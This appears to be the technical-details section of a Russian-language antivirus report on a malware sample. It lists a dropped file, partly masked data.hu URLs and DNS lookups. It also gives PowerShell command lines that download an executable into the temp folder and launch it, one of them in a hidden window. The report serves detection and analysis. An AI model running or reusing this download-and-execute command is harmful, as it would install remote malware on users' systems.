Техническая информация
- http://dd##.data.hu/get/396115/11937867/fnew.exe как %temp%\33.exe
- %TEMP%\33.exe
- http://dd##.data.hu/get/396115/11937867/FNEW.exe
- http://da#a.hu/missing.php
- DNS ASK dd##.data.hu
- DNS ASK da#a.hu
- '<SYSTEM32>\cmd.exe' /c powershell (new-object System.Net.WebClienT).DownloadFile('http://dd##.data.hu/get/396115/11937867/FNEW.exe','%temp%\33.exe'); Start '%temp%\33.exe'' (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /c powershell (new-object System.Net.WebClienT).DownloadFile('http://dd##.data.hu/get/396115/11937867/FNEW.exe','%temp%\33.exe'); Start '%temp%\33.exe'